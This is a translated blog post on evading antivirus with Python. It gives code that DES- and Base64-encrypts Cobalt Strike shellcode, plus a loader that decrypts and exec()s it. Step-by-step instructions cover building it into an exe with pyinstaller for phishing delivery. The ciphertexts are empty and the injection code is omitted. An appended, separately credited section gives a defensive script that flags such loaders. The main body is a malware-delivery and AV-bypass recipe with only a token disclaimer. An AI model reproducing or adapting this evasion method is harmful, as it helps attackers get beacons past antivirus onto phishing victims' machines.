A discussion of exe AV-evasion techniques
2022-07-22 06:02:00 【goddemon】
Preface:
This article is intended only for penetration-testing study and exchange. Any direct or indirect consequences and losses caused by spreading or using the information provided in this article are the sole responsibility of the user; the author of this article bears no responsibility for them.
Recently I analyzed the evasion tricks in most of the common languages on the market: C, Python, Rust and Go. I studied them and wrote my own. Python is indeed the simplest, but if you want deep evasion you still need process injection and ring0-level tactics to fight the AV software; otherwise it is only static evasion, which is too easy, and some behaviors will still be caught by dynamic detection.
This article shares a Python one; see the body for the result. There are others as well, but I'm sure I won't release them now.
Main text:
At the very beginning:
After the change:
Principle: the core is still encrypting the shellcode and the loader. Separating them is of course possible, but to hinder tracing I think keeping them together is actually fine.
DES + Base64
Shellcode encryption:
```python
import binascii
from pyDes import des, CBC, PAD_PKCS5  # requires: pip install pyDes


def des_encrypt(secret_key, s):
    """DES-CBC encrypt with PKCS5 padding; the 8-byte key doubles as the IV."""
    iv = secret_key
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5)
    en = k.encrypt(s, padmode=PAD_PKCS5)
    return binascii.b2a_hex(en)  # hex-encoded ciphertext, as bytes


def des_decrypt(secret_key, s):
    """Reverse of des_encrypt: hex ciphertext in, plaintext bytes out."""
    iv = secret_key
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5)
    de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5)
    return de


secret_str = des_encrypt('12345678', 'I love YOU~')
print(secret_str)
clear_str = des_decrypt('12345678', secret_str)
print(clear_str)
```
Loader:
```python
# -*- coding:utf-8 -*-
import ctypes
import base64
import binascii
from pyDes import des, CBC, PAD_PKCS5


def des_decrypt(secret_key, s):
    """DES-CBC decrypt a hex ciphertext string; the key doubles as the IV."""
    iv = secret_key
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5)
    de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5)
    return de


if __name__ == '__main__':
    # Layer 1: DES ciphertext (not included in the post) -> Base64 text
    shell_code = des_decrypt('12345678', '')
    shell_code = str(shell_code, encoding='utf-8')
    # Layer 2: Base64 -> hex string, with the inserted '&' characters stripped
    shellcode1 = base64.b64decode(shell_code)
    # replacement target lost in extraction; '' assumed, matching the loader branch below
    shellcode = shellcode1.decode().replace('&', '')
    # Layer 3: hex string -> raw shellcode bytes
    shellcode = bytes.fromhex(str(shellcode))
    # The loader source goes through the same DES -> Base64 layers and is then exec()'d
    loader = des_decrypt('12345678', '')
    loader = str(loader, encoding='utf-8')
    loader1 = base64.b64decode(loader)
    loader2 = loader1.decode().replace('&', '')
    exec(loader2)
```
VT result (incomplete):
Usage:
1. Generate the shellcode in CS and download it.
2. Process the generated shellcode: replace `\x` with an empty string, which gives the following.
3. Base64-encode the result of the step above.
4. Encrypt the resulting Base64 string (AES as written here; the code above uses DES) to obtain the ciphertext.
5. Paste that ciphertext into the loader.
6. Compile to an exe:
pyinstaller -F cs.py
Click it and the beacon comes online; combined with phishing techniques this can work perfectly.
Command execution works the same way.
Of course, high-risk actions will still be caught by 360; that is the nature of this kind of evasion. If you want to bypass that, use a special whitelist and the corresponding methods.
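The post only shows the offensive side, so here is an added defender-side example (not code from the author): a small static triage script that parses Python source with the standard `ast` module and flags the co-occurrence of the indicators the loader above exhibits (a pyDes import, a Base64 decode, hex-to-bytes conversion, ctypes, and exec/eval). The indicator table, the `triage`/`is_suspicious` functions and the two sample scripts are my own constructions; the point is that string encryption hides the payload but leaves this decode-then-exec scaffolding in cleartext.

```python
import ast

# Indicator categories seen in the loader above; any listed name satisfies a category.
INDICATORS = {
    "pydes_import": {"pyDes"},
    "base64_decode": {"b64decode", "b32decode", "a85decode"},
    "hex_decode": {"fromhex", "a2b_hex", "unhexlify"},
    "ctypes": {"ctypes"},
    "dynamic_exec": {"exec", "eval"},
}

def _referenced_names(tree):
    # Collect imported module roots, bare names and attribute names from the AST.
    found = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            found.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            found.add(node.module.split(".")[0])
        elif isinstance(node, ast.Name):
            found.add(node.id)
        elif isinstance(node, ast.Attribute):
            found.add(node.attr)
    return found

def triage(source):
    """Return the set of indicator categories present in a Python source string."""
    try:
        names = _referenced_names(ast.parse(source))
    except SyntaxError:  # not parseable Python, so no AST-based verdict
        return set()
    return {cat for cat, words in INDICATORS.items() if names & words}

def is_suspicious(source, threshold=4):
    """Flag when exec/eval co-occurs with at least `threshold` categories in total."""
    hits = triage(source)
    return "dynamic_exec" in hits and len(hits) >= threshold

# Constructed sample shaped like the loader above: no payload, no injection code.
LOADER_LIKE = """
import ctypes, base64, binascii
from pyDes import des, CBC, PAD_PKCS5
def d(k, s):
    return des(k, CBC, k, pad=None, padmode=PAD_PKCS5).decrypt(binascii.a2b_hex(s))
sc = bytes.fromhex(base64.b64decode(d('12345678', '')).decode())
exec(base64.b64decode(d('12345678', '')).decode())
"""
# Constructed benign script: decodes Base64 and hex but never exec()s anything.
BENIGN = "import base64\nprint(base64.b64decode('aGVsbG8='), bytes.fromhex('00ff'))\n"
```

The script works on source text, so for a PyInstaller build it would run over the script recovered from the extracted archive, not over the exe itself.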